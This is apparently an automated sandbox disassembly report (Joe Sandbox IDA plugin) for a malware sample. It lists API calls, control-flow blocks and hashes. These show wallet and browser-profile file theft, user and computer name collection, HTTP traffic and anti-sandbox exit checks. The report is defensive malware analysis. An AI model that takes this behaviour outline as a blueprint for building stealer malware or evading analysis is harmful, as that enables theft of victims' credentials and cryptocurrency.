                          • Opcode Fuzzy Hash: e257b7fa2b8794081521078ef03a0df23ee604560df507cfaef85444adae8a02
                          • Instruction Fuzzy Hash: C5515EB9A04219EFCB04DFA0E994BBE77B9BF94704F108448E41567344D774E9A1CF62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 927500-92754a GetWindowsDirectoryA 1357 927553-9275c7 GetVolumeInformationA call 928d00 * 3 1356->1357 1358 92754c 1356->1358 1365 9275d8-9275df 1357->1365 1358->1357 1366 9275e1-9275fa call 928d00 1365->1366 1367 9275fc-927617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 927628-927658 wsprintfA call 92a740 1367->1369 1370 927619-927626 call 92a740 1367->1370 1377 92767e-92768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00927542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0092760A
                          • wsprintfA.USER32 ref: 00927640
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                          • Instruction ID: b02316957ef1892a5b926a535e718bd6fb64d1c87cd350b7bd84443d3ae7b451
                          • Opcode Fuzzy Hash: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                          • Instruction Fuzzy Hash: F34181B1D05358ABDB10DF94EC45BEEBBB8EF48704F100199F50977284DB786A44CBA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010431E0), ref: 009298A1
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010430F0), ref: 009298BA
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043240), ref: 009298D2
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043180), ref: 009298EA
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043258), ref: 00929903
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,0104A018), ref: 0092991B
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01035970), ref: 00929933
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010359F0), ref: 0092994C
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010431C8), ref: 00929964
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01043288), ref: 0092997C
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01042FE8), ref: 00929995
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010432A0), ref: 009299AD
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,01035710), ref: 009299C5
                            • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,010432B8), ref: 009299DE
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 009111D0: ExitProcess.KERNEL32 ref: 00911211
                            • Part of subcall function 00911160: GetSystemInfo.KERNEL32(?), ref: 0091116A
                            • Part of subcall function 00911160: ExitProcess.KERNEL32 ref: 0091117E
                            • Part of subcall function 00911110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                            • Part of subcall function 00911110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                            • Part of subcall function 00911110: ExitProcess.KERNEL32 ref: 00911143
                            • Part of subcall function 00911220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                            • Part of subcall function 00911220: ExitProcess.KERNEL32 ref: 00911294
                            • Part of subcall function 00926770: GetUserDefaultLangID.KERNEL32 ref: 00926774
                            • Part of subcall function 00911190: ExitProcess.KERNEL32 ref: 009111C6
                            • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                            • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                            • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                            • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                            • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                            • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                          • Sleep.KERNEL32(00001770), ref: 00926B04
                          • CloseHandle.KERNEL32(?,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                          • ExitProcess.KERNEL32 ref: 00926B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                          • Instruction ID: 4978d9055bc26413ef4afb0b049c42c0a5ea1102fdcecde83084502cdc4e5b7a
                          • Opcode Fuzzy Hash: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                          • Instruction Fuzzy Hash: A3312172A04228ABDB04FBF0FC57BEEB778AF94341F104518F212B2199DF745945CAA6

                          Control-flow Graph (image not reproduced): blocks 926aba-926b22; OpenEventA succeeds into a CloseHandle/Sleep loop back to the check, while the CreateEventA path falls through to CloseHandle and ExitProcess.
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                          • Sleep.KERNEL32(00001770), ref: 00926B04
                          • CloseHandle.KERNEL32(?,00000000,?,01049F18,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                          • ExitProcess.KERNEL32 ref: 00926B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                          • Instruction ID: f213d2ce21cdaa48c3a1686af65c2daa6e60e234a3258933bed02b7d26088f6a
                          • Opcode Fuzzy Hash: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                          • Instruction Fuzzy Hash: 1EF05E30944329EBE710ABA0EC16BBD7B34EF54702F104A54B502B25C9CFB05940D656

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                          • Instruction ID: c096f88b55bec928c044c6a19352ee664351af0adc709922471dbca84c76208d
                          • Opcode Fuzzy Hash: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                          • Instruction Fuzzy Hash: AA210EB1D00209ABDF14DFA4E845BDE7B75FF45320F108625F915A7291EB706A05CB91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                            • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,01050A00), ref: 00916303
                            • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                            • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,010500C8,00000000,00000000,00400100,00000000), ref: 00916385
                            • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                            • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                          • Instruction ID: 2facb571303a0009cefb9ed47e2a051c374560baba731545e8c7635dcc9c16ff
                          • Opcode Fuzzy Hash: 629209f17229214b3c379e80a77601af8535a9236ee0b4780b5d120796ca2063
                          • Instruction Fuzzy Hash: A8115231900118ABCB14FF70ED52BED737DAF90300F404558F91A5B1A6EF34AB09CA95

                          Control-flow Graph (image not reproduced): blocks 911220-91129d; GlobalMemoryStatusEx is called, then a comparison branches either to ExitProcess (911292) or to the function's return path (91129a).
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                          • ExitProcess.KERNEL32 ref: 00911294
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                          • Instruction ID: 5432d1320e76f09028c22378c4ff5381f47667cde79dd030ef8d2a3626b243ae
                          • Opcode Fuzzy Hash: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                          • Instruction Fuzzy Hash: C6016DB0E4531CBBEF10DBE0DC4ABDEBBB8AB54702F208548E705B62C0DB7455818B99
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                          • ExitProcess.KERNEL32 ref: 00911143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                          • Instruction ID: 2337623b8ded51157699efb65a8e31ed59ec45292632909cc8150050a3d08c25
                          • Opcode Fuzzy Hash: 4de000d143ba33628fbc1d2b64d24baf5661c2303e15fb989b9db8129a43d1cf
                          • Instruction Fuzzy Hash: DAE0E670A4534CFBE710ABA09C0AB497A78AB04B12F104194F709775D0DAB52A409699
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009110B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009110F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                          • Instruction ID: 9bea2697903472f2613cbef14641007c939b3d9e925afcc9658e8b2384c61c32
                          • Opcode Fuzzy Hash: 26169b163b5056946248bfdb311e31f23fcffdf7af01ca092cdb2cee8e0e5d27
                          • Instruction Fuzzy Hash: 19F0E271A41318BBE7149AA4AC59FAFB7ECE709B15F300988F604E3280D9719E40CAA0
                          APIs
                            • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                            • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                            • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                            • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                            • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                            • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                          • ExitProcess.KERNEL32 ref: 009111C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                          • Instruction ID: 76662ba0645585471d80407e0367c7eab48268999fc079d928f6c79ef4e4af51
                          • Opcode Fuzzy Hash: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                          • Instruction Fuzzy Hash: 7FE017B5E1831563CA0073F0BC8BB2B769C5B9434AF040968FA09E3206FE25E800866A
                          APIs
                          • wsprintfA.USER32 ref: 009238CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 009238E3
                          • lstrcat.KERNEL32(?,?), ref: 00923935
                          • StrCmpCA.SHLWAPI(?,00930F70), ref: 00923947
                          • StrCmpCA.SHLWAPI(?,00930F74), ref: 0092395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00923C67
                          • FindClose.KERNEL32(000000FF), ref: 00923C7C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                          • Instruction ID: 4b864ea7f1702756f7f2e293ba68d620f14d661fbca05505186f1f56e0c6a62c
                          • Opcode Fuzzy Hash: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                          • Instruction Fuzzy Hash: 9BA121B1A003189BDB24DF64DC85FEE737DBB88301F048698A64DA7145EB759B84CF62
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • FindFirstFileA.KERNEL32(00000000,?,00930B32,00930B2B,00000000,?,?,?,009313F4,00930B2A), ref: 0091BEF5
                          • StrCmpCA.SHLWAPI(?,009313F8), ref: 0091BF4D
                          • StrCmpCA.SHLWAPI(?,009313FC), ref: 0091BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0091C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0091C7D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                          • Instruction ID: 9529a517fb7514f4852e30b769f26bf1bef15e88a53b73eaa15345b6462fe061
                          • Opcode Fuzzy Hash: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                          • Instruction Fuzzy Hash: 58424272A10118ABCB14FB60EC96FED737DAFD8300F404558F50AA7195EE349B49CB96
                          APIs
                          • wsprintfA.USER32 ref: 0092492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00924943
                          • StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                          • StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                          • FindClose.KERNEL32(000000FF), ref: 00924B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                          • Instruction ID: d90b965799f7d59c1564475fbe87061bf34d4e2fa39d2c6a14e9702d85a60763
                          • Opcode Fuzzy Hash: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                          • Instruction Fuzzy Hash: 93612771500218ABCB24EBA0EC55FEE777CBB88701F0446D8B609A6145EF75EB85CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                          • wsprintfA.USER32 ref: 009245A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                          • StrCmpCA.SHLWAPI(?,00930FC4), ref: 009245EB
                          • StrCmpCA.SHLWAPI(?,00930FC8), ref: 00924601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0092468B
                          • FindClose.KERNEL32(000000FF), ref: 009246A0
                          • lstrcat.KERNEL32(?,01050A30), ref: 009246C5
                          • lstrcat.KERNEL32(?,0104F880), ref: 009246D8
                          • lstrlen.KERNEL32(?), ref: 009246E5
                          • lstrlen.KERNEL32(?), ref: 009246F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                          • Instruction ID: bab89844420c2c48b9097e782125e2adf17d65bb39f232b0782ab0cb14f524ae
                          • Opcode Fuzzy Hash: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                          • Instruction Fuzzy Hash: 215145B5500218ABC764EB70DC89FED737CAB98701F4046C8F609A7194EF759B848F92
                          APIs
                          • wsprintfA.USER32 ref: 00923EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00923EDA
                          • StrCmpCA.SHLWAPI(?,00930FAC), ref: 00923F08
                          • StrCmpCA.SHLWAPI(?,00930FB0), ref: 00923F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0092406C
                          • FindClose.KERNEL32(000000FF), ref: 00924081
                          Strings
                          Memory Dump Source
